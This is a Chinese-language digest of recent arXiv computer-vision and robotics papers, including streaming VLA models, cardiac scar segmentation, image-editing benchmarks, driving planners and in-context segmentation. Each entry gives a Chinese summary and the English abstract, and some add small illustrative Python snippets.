[CV-22] StreamingVLA: Streaming Vision-Language-Action Model with Action Flow Matching and Adaptive Early Observation
【速读】:该论文旨在解决视觉-语言-动作(Vision-Language-Action, VLA)模型在资源受限的边缘平台部署时面临的高计算开销与执行延迟问题,尤其是由于VLA各阶段(观测、动作生成与执行)必须串行进行导致的频繁停顿和高延迟。解决方案的关键在于提出一种“流式”异步并行机制,通过两个核心设计实现:其一,摒弃传统的动作分块(action chunking)方式,采用动作流匹配(action flow matching)方法学习连续的动作轨迹,从而将动作生成与执行阶段的延迟重叠;其二,设计基于动作显著性感知的自适应观测机制,使执行阶段与观测阶段的延迟得以重叠。该方案在不牺牲性能的前提下,实现了2.4倍的延迟加速,并将执行停顿次数减少6.5倍。
链接: https://arxiv.org/abs/2603.28565
作者: Yiran Shi,Dongqi Guo,Tianchen Zhao,Feng Gao,Liangzhi Shi,Chao Yu,ZhiJian Mo,Qihua Xiao,XiaoShuai Peng,Qingmin Liao,Yu Wang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language-action (VLA) models have demonstrated exceptional performance in natural language-driven perception and control. However, the high computational cost of VLA models poses significant efficiency challenges, particularly for resource-constrained edge platforms in real-world deployments. Moreover, since different stages of VLA (observation, action generation and execution) must proceed sequentially, each waiting for the completion of the preceding stage, the system suffers from frequent halting and high latency. To address this, we conduct a systematic analysis to identify the challenges for fast and fluent generation, and propose enabling VLAs with the ability to asynchronously parallelize across VLA stages in a “streaming” manner. First, we eliminate the reliance on action chunking and adopt action flow matching, which learns the trajectory of action flows rather than denoising chunk-wise actions. It overlaps the latency of action generation and execution. Second, we design an action saliency-aware adaptive observation mechanism, thereby overlapping the latency of execution and observation. Without sacrificing performance, StreamingVLA achieves substantial speedup and improves the fluency of execution. It achieves a 2.4x latency speedup and reduces execution halting by 6.5x.
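"阶段重叠"带来的延迟收益可以用经典流水线模型直观理解。以下各阶段耗时为任意假设数字,仅用于对比严格串行与重叠执行(并非 StreamingVLA 的实测数据):

```python
def sequential_latency(obs, gen, exe, n_cycles):
    """各阶段严格串行: 每个周期都要等前一阶段完成。"""
    return n_cycles * (obs + gen + exe)

def pipelined_latency(obs, gen, exe, n_cycles):
    """阶段重叠执行: 预热一个周期后, 吞吐受最慢阶段限制。"""
    return (obs + gen + exe) + (n_cycles - 1) * max(obs, gen, exe)

# 假设观测 10ms、动作生成 30ms、执行 40ms, 连续运行 5 个周期
seq = sequential_latency(10, 30, 40, n_cycles=5)
pipe = pipelined_latency(10, 30, 40, n_cycles=5)
```

论文的两个设计分别对应让"生成与执行"、"执行与观测"进入这种重叠状态,从而减少停顿。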
[CV-23] Curriculum-Guided Myocardial Scar Segmentation for Ischemic and Non-ischemic Cardiomyopathy
【速读】:该论文旨在解决从晚期钆增强心脏磁共振(Late Gadolinium Enhancement Cardiac Magnetic Resonance, LGE-CMR)图像中可靠分割心肌瘢痕的难题,尤其针对因患者间对比增强差异、成像条件不佳(如造影剂洗脱)以及弥散性瘢痕标注不一致(由观察者间变异引起)导致的分割性能下降问题。解决方案的关键在于提出一种基于课程学习(curriculum learning)的框架,通过设计一种渐进式训练策略,引导模型从高置信度、边界清晰的瘢痕区域逐步过渡到低置信度或视觉模糊的样本(尤其是瘢痕负荷较小的情况),从而提升模型对不确定标签和细微瘢痕特征的鲁棒性,显著改善在临床实际中难以处理的微小或弥散性瘢痕的分割准确性和一致性。
链接: https://arxiv.org/abs/2603.28560
作者: Nivetha Jayakumar,Jonathan Pan,Shuo Wang,Bishow Paudel,Nisha Hosadurg,Cristiane C. Singulane,Sivam Bhatt,Amit R. Patel,Miaomiao Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Identification and quantification of myocardial scar is important for diagnosis and prognosis of cardiovascular diseases. However, reliable scar segmentation from Late Gadolinium Enhancement Cardiac Magnetic Resonance (LGE-CMR) images remains a challenge due to variations in contrast enhancement across patients, suboptimal imaging conditions such as post-contrast washout, and inconsistencies in ground truth annotations on diffuse scars caused by inter-observer variability. In this work, we propose a curriculum learning-based framework designed to improve segmentation performance under these challenging conditions. The method introduces a progressive training strategy that guides the model from high-confidence, clearly defined scar regions to low-confidence or visually ambiguous samples with limited scar burden. By structuring the learning process in this manner, the network develops robustness to uncertain labels and subtle scar appearances that are often underrepresented in conventional training pipelines. Experimental results show that the proposed approach enhances segmentation accuracy and consistency, particularly for cases with minimal or diffuse scar, outperforming standard training baselines. This strategy provides a principled way to leverage imperfect data for improved myocardial scar quantification in clinical applications. Our code is publicly available on GitHub.
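课程学习的核心是按"置信度从高到低"分阶段扩大训练集。一个最小化的调度示意如下(样本置信度与阶段划分比例均为假设值,并非论文的具体课程设计):

```python
def curriculum_stages(confidences, n_stages):
    """按置信度降序排样本, 第 s 阶段使用前 s/n_stages 比例的样本。"""
    order = sorted(range(len(confidences)), key=lambda i: -confidences[i])
    stages = []
    for s in range(1, n_stages + 1):
        k = max(1, round(len(order) * s / n_stages))
        stages.append(order[:k])   # 各阶段训练集是前一阶段的超集
    return stages

# 4 个样本的瘢痕标注置信度 (假设值): 高置信度样本先进入训练
stages = curriculum_stages([0.9, 0.2, 0.7, 0.5], n_stages=2)
```

训练早期只接触边界清晰的高置信度瘢痕,后期才逐步纳入弥散、低置信度样本,使模型对不一致标注更稳健。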
[CV-24] Domain-Invariant Prompt Learning for Vision-Language Models
【速读】:该论文旨在解决大型预训练视觉语言模型(如CLIP)在面对未见分布时的域偏移(domain shift)问题,即模型在跨域场景下性能下降的问题。现有方法如Context Optimization (CoOp) 虽能通过学习上下文向量实现下游任务适配,但缺乏对域不变性的显式建模机制。解决方案的关键在于提出Domain-invariant Context Optimization (DiCoOp),其核心是引入对抗训练策略,在优化分类判别能力的同时强制模型学习对不同域具有不变性的提示(prompt),从而提升模型在多样视觉域上的泛化能力。
链接: https://arxiv.org/abs/2603.28555
作者: Arsham Gholamzadeh Khoee,Yinan Yu,Robert Feldt
机构: Chalmers University of Technology (查尔姆斯理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Large pre-trained vision-language models like CLIP have transformed computer vision by aligning images and text in a shared feature space, enabling robust zero-shot transfer via prompting. Soft-prompting, such as Context Optimization (CoOp), effectively adapts these models for downstream recognition tasks by learning a set of context vectors. However, CoOp lacks explicit mechanisms for handling domain shifts across unseen distributions. To address this, we propose Domain-invariant Context Optimization (DiCoOp), an extension of CoOp optimized for domain generalization. By employing an adversarial training approach, DiCoOp forces the model to learn domain-invariant prompts while preserving discriminative power for classification. Experimental results show that DiCoOp consistently surpasses CoOp in domain generalization tasks across diverse visual domains.
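对抗训练的效果是让提示向量"保留任务方向分量、消除域方向分量"。下面用一个极度简化的二维示意演示这一点:这里把联合训练的域分类器替换为一个已知的固定域方向,并以不变性正则近似对抗目标(与 DiCoOp 的实际对抗机制不同,仅为直观演示):

```python
import numpy as np

d = np.array([1.0, 0.0])   # 域分类器可利用的"域方向"(假设已知)
t = np.array([0.0, 1.0])   # 任务判别方向

prompt = np.array([1.0, 0.2])   # 初始提示向量, 含域信息分量
lr, lam = 0.1, 1.0
for _ in range(200):
    grad_task = -t                        # 最小化 -(prompt·t): 保持判别力
    grad_dom = 2.0 * (prompt @ d) * d     # 最小化 (prompt·d)^2: 抹平域信息
    prompt = prompt - lr * (grad_task + lam * grad_dom)
```

迭代后提示在域方向上的分量衰减到近零,而任务方向分量持续增长,即"域不变但可判别"。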
[CV-25] MarkushGrapher-2: End-to-end Multimodal Recognition of Chemical Structures CVPR2026
【速读】:该论文旨在解决从多模态文档中自动识别Markush结构(Markush structures)的精度不足问题,此类结构常出现在专利文献中,其复杂性导致现有方法难以实现大规模自动化处理。解决方案的关键在于提出MarkushGrapher-2,一个端到端的多模态识别框架:首先利用专用光学字符识别(OCR)模型提取化学图像中的文本;其次通过视觉-文本-布局编码器(Vision-Text-Layout encoder)与光学化学结构识别视觉编码器联合编码图像、文本和布局信息;最后采用两阶段训练策略融合特征并自回归生成Markush结构表示。此外,为缓解数据稀缺问题,作者构建了大规模真实世界Markush结构数据集,并发布了IP5-M基准数据集以推动该领域研究进展。
链接: https://arxiv.org/abs/2603.28550
作者: Tim Strohmeyer,Lucas Morin,Gerhard Ingmar Meijer,Valéry Weber,Ahmed Nassar,Peter Staar
机构: IBM Research(IBM研究院); ETH Zurich(苏黎世联邦理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 15 pages, to be published in CVPR 2026
Abstract:Automatically extracting chemical structures from documents is essential for the large-scale analysis of the literature in chemistry. Automatic pipelines have been developed to recognize molecules represented either in figures or in text independently. However, methods for recognizing chemical structures from multimodal descriptions (Markush structures) lag behind in precision and cannot be used for automatic large-scale processing. In this work, we present MarkushGrapher-2, an end-to-end approach for the multimodal recognition of chemical structures in documents. First, our method employs a dedicated OCR model to extract text from chemical images. Second, the text, image, and layout information are jointly encoded through a Vision-Text-Layout encoder and an Optical Chemical Structure Recognition vision encoder. Finally, the resulting encodings are effectively fused through a two-stage training strategy and used to auto-regressively generate a representation of the Markush structure. To address the lack of training data, we introduce an automatic pipeline for constructing a large-scale dataset of real-world Markush structures. In addition, we present IP5-M, a large manually-annotated benchmark of real-world Markush structures, designed to advance research on this challenging task. Extensive experiments show that our approach substantially outperforms state-of-the-art models in multimodal Markush structure recognition, while maintaining strong performance in molecule structure recognition. Code, models, and datasets are released publicly.
[CV-26] Seen2Scene: Completing Realistic 3D Scenes with Visibility-Guided Flow
【速读】:该论文旨在解决现有3D场景补全与生成方法依赖完整且合成的3D数据,难以在真实、不完整观测条件下实现高质量重建的问题。其关键解决方案是提出Seen2Scene,一种基于流匹配(flow matching)的方法,直接在不完整的真实3D扫描上训练,通过引入可见性引导的流匹配机制显式掩码未知区域,从而有效利用真实世界的局部观测进行学习;同时采用截断有符号距离场(TSDF)体积表示和稀疏Transformer架构,在保持复杂场景结构建模能力的同时,实现对缺失区域的合理推理与补全。
链接: https://arxiv.org/abs/2603.28548
作者: Quan Meng,Yujin Chen,Lei Li,Matthias Nießner,Angela Dai
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL Video: this https URL
Abstract:We present Seen2Scene, the first flow matching-based approach that trains directly on incomplete, real-world 3D scans for scene completion and generation. Unlike prior methods that rely on complete and hence synthetic 3D data, our approach introduces visibility-guided flow matching, which explicitly masks out unknown regions in real scans, enabling effective learning from real-world, partial observations. We represent 3D scenes using truncated signed distance field (TSDF) volumes encoded in sparse grids and employ a sparse transformer to efficiently model complex scene structures while masking unknown regions. We employ 3D layout boxes as an input conditioning signal, and our approach is flexibly adapted to various other inputs such as text or partial scans. By learning directly from real-world, incomplete 3D scans, Seen2Scene enables realistic 3D scene completion for complex, cluttered real environments. Experiments demonstrate that our model produces coherent, complete, and realistic 3D scenes, outperforming baselines in completion accuracy and generation quality.
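"可见性引导"的关键是流匹配损失只在已观测区域上计算,未知区域被显式掩掉。最小示意如下(速度场与可见性掩码均为随机玩具数据,并非论文的 TSDF 体素实现):

```python
import numpy as np

def masked_fm_loss(pred_v, target_v, visible):
    """流匹配回归损失, 仅统计可见体素。"""
    return float(((pred_v - target_v) ** 2)[visible].mean())

rng = np.random.default_rng(0)
target_v = rng.standard_normal((4, 4))
pred_v = target_v.copy()
pred_v[0, 0] += 10.0                 # 在"未观测"体素上制造大误差
visible = np.ones((4, 4), dtype=bool)
visible[0, 0] = False                # 该体素在真实扫描中不可见

masked = masked_fm_loss(pred_v, target_v, visible)
plain = float(((pred_v - target_v) ** 2).mean())   # 未加掩码的对照
```

由于未知区域不产生监督信号,模型不会被不完整扫描中的空洞误导,这使得直接在真实残缺数据上训练成为可能。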
[CV-27] GEditBench v2: A Human-Aligned Benchmark for General Image Editing
【速读】:该论文旨在解决当前图像编辑模型评估框架中存在的两大问题:一是现有基准测试任务覆盖范围狭窄,难以全面反映模型在真实场景下的能力;二是标准评价指标无法有效衡量视觉一致性(visual consistency),即编辑前后图像在身份、结构和语义层面的一致性。其解决方案的关键在于提出GEditBench v2基准测试平台与PVC-Judge评估模型:GEditBench v2包含1200个真实用户查询,涵盖23项任务并引入开放集类别以支持未定义的编辑指令;PVC-Judge则通过两种新颖的区域解耦偏好数据合成流水线训练而成,能够更精准地评估视觉一致性,并在VCReward-Bench上验证其与人类判断高度对齐,甚至优于GPT-5.1。
链接: https://arxiv.org/abs/2603.28547
作者: Zhangqi Jiang,Zheng Sun,Xianfang Zeng,Yufeng Yang,Xuanyang Zhang,Yongliang Wu,Wei Cheng,Gang Yu,Xu Yang,Bihan Wen
机构: Nanyang Technological University(南洋理工大学); StepFun; Southeast University(东南大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 30 pages, 24 figures
Abstract:Recent advances in image editing have enabled models to handle complex instructions with impressive realism. However, existing evaluation frameworks lag behind: current benchmarks suffer from narrow task coverage, while standard metrics fail to adequately capture visual consistency, i.e., the preservation of identity, structure and semantic coherence between edited and original images. To address these limitations, we introduce GEditBench v2, a comprehensive benchmark with 1,200 real-world user queries spanning 23 tasks, including a dedicated open-set category for unconstrained, out-of-distribution editing instructions beyond predefined tasks. Furthermore, we propose PVC-Judge, an open-source pairwise assessment model for visual consistency, trained via two novel region-decoupled preference data synthesis pipelines. Besides, we construct VCReward-Bench using expert-annotated preference pairs to assess the alignment of PVC-Judge with human judgments on visual consistency evaluation. Experiments show that our PVC-Judge achieves state-of-the-art evaluation performance among open-source models and even surpasses GPT-5.1 on average. Finally, by benchmarking 16 frontier editing models, we show that GEditBench v2 enables more human-aligned evaluation, revealing critical limitations of current models, and providing a reliable foundation for advancing precise image editing.
[CV-28] ManipArena: Comprehensive Real-world Evaluation of Reasoning -Oriented Generalist Robot Manipulation CVPR2026
【速读】:该论文旨在解决当前视觉-语言-动作(Vision-Language-Action, VLA)模型与世界模型在机器人智能领域发展中面临的评估瓶颈问题,即现有基准测试主要依赖仿真环境,难以反映真实场景中的感知噪声、复杂接触动力学、硬件限制及系统延迟等“现实差距”(reality gap),且不同机器人平台间的实验碎片化导致公平性和可复现性不足。解决方案的关键在于提出ManipArena这一标准化评估框架,其核心包括:1)涵盖10,812条专家轨迹的20个多样化任务,聚焦语义与空间推理导向的操作任务;2)通过受控的分布外设置支持多层级泛化能力评估;3)扩展至长周期移动操作任务,超越桌面场景限制;4)提供丰富的传感诊断信息(如低级电机信号)及高保真3D扫描构建的真实-仿真同步环境,从而实现对VLA和世界模型方法的公平、真实且可复现的评估,为具身智能系统的诊断与演进提供可扩展基础。
链接: https://arxiv.org/abs/2603.28545
作者: Yu Sun,Meng Cao,Ping Yang,Rongtao Xu,Yunxiao Yan,Runze Xu,Liang Ma,Roy Gan,Andy Zhai,Qingxuan Chen,Zunnan Xu,Hao Wang,Jincheng Yu,Lucy Liang,Qian Wang,Ivan Laptev,Ian D Reid,Xiaodan Liang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: Technical report for CVPR 2026 Challenge ManipArena
Abstract:Vision-Language-Action (VLA) models and world models have recently emerged as promising paradigms for general-purpose robotic intelligence, yet their progress is hindered by the lack of reliable evaluation protocols that reflect real-world deployment. Existing benchmarks are largely simulator-centric, which provide controllability but fail to capture the reality gap caused by perception noise, complex contact dynamics, hardware constraints, and system latency. Moreover, fragmented real-world evaluations across different robot platforms prevent fair and reproducible comparison. To address these challenges, we introduce ManipArena, a standardized evaluation framework designed to bridge simulation and real-world execution. ManipArena comprises 20 diverse tasks across 10,812 expert trajectories emphasizing reasoning-oriented manipulation tasks requiring semantic and spatial reasoning, supports multi-level generalization through controlled out-of-distribution settings, and incorporates long-horizon mobile manipulation beyond tabletop scenarios. The framework further provides rich sensory diagnostics, including low-level motor signals, and synchronized real-to-sim environments constructed via high-quality 3D scanning. Together, these features enable fair, realistic, and reproducible evaluation for both VLA and world model approaches, providing a scalable foundation for diagnosing and advancing embodied intelligence systems.
[CV-29] RAD-LAD: Rule and Language Grounded Autonomous Driving in Real-Time
【速读】:该论文旨在解决自动驾驶中语言驱动决策与运动规划的实时性与性能瓶颈问题,特别是现有方法在延迟和泛化能力上的不足。其核心解决方案是提出LAD(Language–Action Planner),一种具有可中断架构的实时语言-动作规划器,能够在单次前向传播中以约20 Hz的速度生成运动规划,或在约10 Hz下同步输出文本推理与运动规划,显著降低延迟(比先前驾驶语言模型快约3倍)并提升nuPlan Test14-Hard和InterPlan基准上的学习基线性能;同时引入RAD(Rule-based Action Planner),用于克服PDM-Closed结构限制,并在规则类规划器中达到最优表现;最终通过融合RAD与LAD构建混合规划系统,实现规则可靠性与语言自适应性及可解释性的互补协同,从而兼顾安全性与灵活性。
链接: https://arxiv.org/abs/2603.28522
作者: Anurag Ghosh,Srinivasa Narasimhan,Manmohan Chandraker,Francesco Pittaluga
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:We present LAD, a real-time language–action planner with an interruptible architecture that produces a motion plan in a single forward pass (~20 Hz) or generates textual reasoning alongside a motion plan (~10 Hz). LAD is fast enough for real-time closed-loop deployment, achieving ~3x lower latency than prior driving language models while setting a new learning-based state of the art on nuPlan Test14-Hard and InterPlan. We also introduce RAD, a rule-based planner designed to address structural limitations of PDM-Closed. RAD achieves state-of-the-art performance among rule-based planners on nuPlan Test14-Hard and InterPlan. Finally, we show that combining RAD and LAD enables hybrid planning that captures the strengths of both approaches. This hybrid system demonstrates that rules and learning provide complementary capabilities: rules support reliable maneuvering, while language enables adaptive and explainable decision-making.
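RAD 与 LAD 的混合规划可以退化为一个简单的"置信度回退"策略来理解(以下接口、阈值与占位规划器均为假设,论文的实际融合方式可能更复杂):

```python
def hybrid_plan(scene, rule_planner, lang_planner, threshold=0.8):
    """规则规划器置信度足够时直接采用其结果, 否则回退到语言规划器。"""
    plan, conf = rule_planner(scene)
    if conf >= threshold:
        return "rule", plan
    return "lang", lang_planner(scene)

# 两个占位规划器: 规则规划器在常规路况下置信度高, 罕见路况下置信度低
rule = lambda s: (["keep_lane"], 0.95 if s == "highway" else 0.3)
lang = lambda s: ["slow_down", "yield"]

src1, plan1 = hybrid_plan("highway", rule, lang)
src2, plan2 = hybrid_plan("construction_zone", rule, lang)
```

这对应摘要的互补性结论:规则保证常规机动的可靠性,语言模型在规则失效的长尾场景中提供自适应与可解释的决策。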
[CV-30] Generalizable Detection of AI Generated Images with Large Models and Fuzzy Decision Tree
【速读】:该论文旨在解决生成式 AI (Generative AI) 生成图像的恶意使用与广泛传播对数字内容真实性造成的威胁,特别是现有检测方法因模型特异性过拟合而泛化能力不足的问题。解决方案的关键在于提出一种新颖的检测框架,通过模糊决策树(fuzzy decision tree)协同融合轻量级感知型人工痕迹检测器与多模态大语言模型(Multimodal Large Language Models, MLLMs),将基础检测器的输出作为模糊隶属度值,实现语义层面与感知层面互补信息的自适应融合,从而在多种生成模型上均展现出卓越的检测准确率和强泛化能力。
链接: https://arxiv.org/abs/2603.28508
作者: Fei Wu,Guanghao Ding,Zijian Niu,Zhenrui Wang,Lei Yang,Zhuosheng Zhang,Shilin Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The malicious use and widespread dissemination of AI-generated images pose a serious threat to the authenticity of digital content. Existing detection methods exploit low-level artifacts left by common manipulation steps within the generation pipeline, but they often lack generalization due to model-specific overfitting. Recently, researchers have resorted to Multimodal Large Language Models (MLLMs) for AIGC detection, leveraging their high-level semantic reasoning and broad generalization capabilities. While promising, MLLMs lack the fine-grained perceptual sensitivity to subtle generation artifacts, making them inadequate as standalone detectors. To address this issue, we propose a novel AI-generated image detection framework that synergistically integrates lightweight artifact-aware detectors with MLLMs via a fuzzy decision tree. The decision tree treats the outputs of basic detectors as fuzzy membership values, enabling adaptive fusion of complementary cues from semantic and perceptual perspectives. Extensive experiments demonstrate that the proposed method achieves state-of-the-art accuracy and strong generalization across diverse generative models.
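把各基础检测器的输出视为模糊隶属度后,决策树节点即可用 t-范数/t-余范数组合两类证据。如下是一个两节点的玩具示意(节点结构与混合权重均为假设,并非论文的模糊决策树):

```python
def fuzzy_and(a, b):            # 乘积 t-范数
    return a * b

def fuzzy_or(a, b):             # 概率和 t-余范数
    return a + b - a * b

def fused_score(semantic, artifact, w=0.5):
    """semantic/artifact ∈ [0,1]: MLLM 语义线索与低层伪影线索的隶属度。"""
    strong = fuzzy_and(semantic, artifact)   # 两类线索同时成立: 强证据
    weak = fuzzy_or(semantic, artifact)      # 任一线索成立: 弱证据
    return w * strong + (1 - w) * weak

fake = fused_score(0.9, 0.8)    # 两条线索都指向"AI 生成"
real = fused_score(0.1, 0.2)    # 两条线索都偏向"真实"
```

这种软融合使语义推理与感知伪影两路互补:任一检测器单独不确定时,另一路仍能拉动最终判决。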
[CV-31] Bridging the Geometry Mismatch: Frequency-Aware Anisotropic Serialization for Thin-Structure SSMs
【速读】:该论文旨在解决细长线状结构分割中因拓扑敏感性导致的长程连通性易受局部误差破坏的问题。现有状态空间模型(State-Space Models, SSMs)虽具备高效长程建模能力,但其各向同性的序列化方式(如栅格扫描)与各向异性目标几何特性不匹配,造成状态传播偏离结构轨迹而非沿其方向进行。解决方案的关键在于提出FGOS-Net框架,通过频率-几何解耦机制将特征分解为稳定拓扑载体与方向性高频带,利用高频成分显式校正下采样引起的空间错位;在此基础上引入频率对齐扫描策略,使序列化过程变为几何条件化的决策,从而保持方向一致性轨迹;同时结合主动探测策略选择性注入高频细节并抑制纹理歧义,显著提升分割精度与效率。
链接: https://arxiv.org/abs/2603.28503
作者: Jin Bai,Huiyao Zhang,Qi Wen,Ningyang Li,Shengyang Li,Atta ur Rahman,Xiaolin Tian
机构: 1. Tsinghua University (清华大学); 2. Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所); 3. University of Engineering and Technology (工程与技术大学); 4. Beijing Institute of Technology (北京理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The segmentation of thin linear structures is inherently topology-critical, where minor local errors can sever long-range connectivity. While recent State-Space Models (SSMs) offer efficient long-range modeling, their isotropic serialization (e.g., raster scanning) creates a geometry mismatch for anisotropic targets, causing state propagation across rather than along the structure trajectories. To address this, we propose FGOS-Net, a framework based on frequency-geometric disentanglement. We first decompose features into a stable topology carrier and directional high-frequency bands, leveraging the latter to explicitly correct spatial misalignments induced by downsampling. Building on this calibrated topology, we introduce frequency-aligned scanning that elevates serialization to a geometry-conditioned decision, preserving direction-consistent traces. Coupled with an active probing strategy to selectively inject high-frequency details and suppress texture ambiguity, FGOS-Net consistently outperforms strong baselines across four challenging benchmarks. Notably, it achieves 91.3% mIoU and 97.1% clDice on DeepCrack while running at 80 FPS with only 7.87 GFLOPs.
[CV-32] ConceptWeaver: Weaving Disentangled Concepts with Flow
【速读】:该论文旨在解决预训练流模型(flow-based models)在生成复杂场景时缺乏直接机制以从单张真实世界图像中解耦并定制潜在概念的问题。其核心挑战在于如何实现对生成过程中不同层次语义信息的精准控制,尤其是在不依赖大量数据的情况下进行内容编辑与合成。解决方案的关键在于发现并利用生成过程的三阶段特性:初始的蓝图阶段(Blueprint Stage)建立低频结构,随后的实例化阶段(Instantiation Stage)使内容概念达到峰值强度并自然解耦,最终的细化阶段(refinement stage)负责细节生成。基于此洞察,作者提出ConceptWeaver框架,通过阶段感知优化策略从单参考图像中学习特定概念的语义偏移,并借助新颖的概念编织引导机制(ConceptWeaver Guidance, CWG),在推理时将这些偏移量精确注入到对应的生成阶段,从而实现高保真、可组合的内容编辑与合成。
链接: https://arxiv.org/abs/2603.28493
作者: Jintao Chen,Aiming Hao,Xiaoqing Chen,Chengyu Bai,Chubin Chen,Yanxun Li,Jiahong Wu,Xiangxiang Chu,Shanghang Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Pre-trained flow-based models excel at synthesizing complex scenes yet lack a direct mechanism for disentangling and customizing their underlying concepts from one-shot real-world sources. To demystify this process, we first introduce a novel differential probing technique to isolate and analyze the influence of individual concept tokens on the velocity field over time. This investigation yields a critical insight: the generative process is not monolithic but unfolds in three distinct stages. An initial Blueprint Stage establishes low-frequency structure, followed by a pivotal Instantiation Stage where content concepts emerge with peak intensity and become naturally disentangled, creating an optimal window for manipulation. A final concept-insensitive refinement stage then synthesizes fine-grained details. Guided by this discovery, we propose ConceptWeaver, a framework for one-shot concept disentanglement. ConceptWeaver learns concept-specific semantic offsets from a single reference image using a stage-aware optimization strategy that aligns with the three-stage framework. These learned offsets are then deployed during inference via our novel ConceptWeaver Guidance (CWG) mechanism, which strategically injects them at the appropriate generative stage. Extensive experiments validate that ConceptWeaver enables high-fidelity, compositional synthesis and editing, demonstrating that understanding and leveraging the intrinsic, staged nature of flow models is key to unlocking precise, multi-granularity content manipulation.
[CV-33] INSID3: Training-Free In-Context Segmentation with DINOv3 CVPR2026
【速读】:该论文旨在解决上下文分割(In-context Segmentation, ICS)中面临的两大核心挑战:一是现有方法依赖微调视觉基础模型(Vision Foundation Models, VFMs),虽提升域内性能但损害泛化能力;二是多冻结VFMs组合方案虽保留泛化性,却引入架构复杂度且分割粒度固定。其解决方案的关键在于提出一种无需训练的极简框架INSID3,利用DINOv3预训练的稠密自监督特征(dense self-supervised features)直接实现语义匹配与分割,无需任何掩码或类别级监督信号,即可在单个冻结骨干网络下支持不同粒度的分割任务(如语义、部件和个性化实例分割),在保持高精度的同时显著降低参数量(减少3倍)。
链接: https://arxiv.org/abs/2603.28480
作者: Claudia Cuttano,Gabriele Trivigno,Christoph Reich,Daniel Cremers,Carlo Masone,Stefan Roth
机构: Politecnico di Torino (都灵理工大学); TU Darmstadt (达姆施塔特工业大学); TU Munich (慕尼黑工业大学); hessian.AI (黑森人工智能); ELIZA (ELIZA); MCML (MCML)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026. Project page: this https URL
Abstract:In-context segmentation (ICS) aims to segment arbitrary concepts, e.g., objects, parts, or personalized instances, given one annotated visual example. Existing work relies on (i) fine-tuning vision foundation models (VFMs), which improves in-domain results but harms generalization, or (ii) combining multiple frozen VFMs, which preserves generalization but yields architectural complexity and fixed segmentation granularities. We revisit ICS from a minimalist perspective and ask: Can a single self-supervised backbone support both semantic matching and segmentation, without any supervision or auxiliary models? We show that scaled-up dense self-supervised features from DINOv3 exhibit strong spatial structure and semantic correspondence. We introduce INSID3, a training-free approach that segments concepts at varying granularities only from frozen DINOv3 features, given an in-context example. INSID3 achieves state-of-the-art results across one-shot semantic, part, and personalized segmentation, outperforming previous work by +7.5% mIoU, while using 3x fewer parameters and without any mask or category-level supervision. Code is available at this https URL.
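为帮助理解"冻结骨干特征 + 语义匹配"的免训练上下文分割思路,下面给出一个最小化示意(非 INSID3 的官方实现):以参考图掩码区域内特征的均值作为类别原型,按余弦相似度阈值对查询图的每个 patch 作前景判定;其中 segment 函数及阈值 0.5 均为假设。

```python
# 假设性示意:免训练的原型匹配分割。
# ref_feats / query_feats 代表冻结自监督骨干提取的 patch 特征(此处手工给定)。
import math

def cosine(u, v):
    # 两个特征向量的余弦相似度
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv)

def segment(ref_feats, ref_mask, query_feats, thresh=0.5):
    # 原型 = 参考图中被标注为前景的 patch 特征均值
    fg = [f for f, m in zip(ref_feats, ref_mask) if m]
    dim = len(fg[0])
    proto = [sum(f[d] for f in fg) / len(fg) for d in range(dim)]
    # 与原型足够相似的查询 patch 判为前景
    return [1 if cosine(f, proto) >= thresh else 0 for f in query_feats]

ref = [[1.0, 0.0], [0.9, 0.1], [0.0, 1.0]]
mask = [1, 1, 0]
query = [[1.0, 0.05], [0.1, 1.0]]
pred = segment(ref, mask, query)  # 第一个 patch 与原型方向一致,判为前景
```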
[CV-34] CiQi-Agent : Aligning Vision Tools and Aesthetics in Multimodal Agent for Cultural Reasoning on Chinese Porcelains
【速读】:该论文旨在解决古陶瓷鉴定领域专业门槛高、非专业人士难以参与的问题,同时辅助专家提升鉴定效率与准确性。其核心挑战在于如何实现对古代瓷器在六个关键属性(朝代、年号、窑口、釉色、纹饰、器型)上的细粒度分析,并生成可解释的、基于视觉与文本证据融合的鉴定描述。解决方案的关键在于构建了一个名为CiQi-Agent的专用陶瓷鉴赏智能代理,该代理结合多图像输入、视觉工具调用和多模态检索增强生成机制,通过监督微调、强化学习及工具增强推理框架训练而成;此外,研究还创建了大规模专家标注数据集CiQi-VQA(含29,596件瓷器、51,553张图像和557,940个视觉问答对)以及基准测试集CiQi-Bench,为模型性能评估提供标准化依据。实验表明,CiQi-Agent(7B)在所有六项属性上均显著优于主流开源与闭源模型,平均准确率高出GPT-5达12.2%。
链接: https://arxiv.org/abs/2603.28474
作者: Wenhan Wang,Zhixiang Zhou,Zhongtian Ma,Yanzhu Chen,Ziyu Lin,Hao Sheng,Pengfei Liu,Honglin Ma,Wenqi Shao,Qiaosheng Zhang,Yu Qiao
机构: Shanghai Innovation Institute (上海创新研究院); Shanghai AI Laboratory (上海人工智能实验室); Shaanxi Academy of Cultural Relics Conservation (陕西省文物考古研究院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
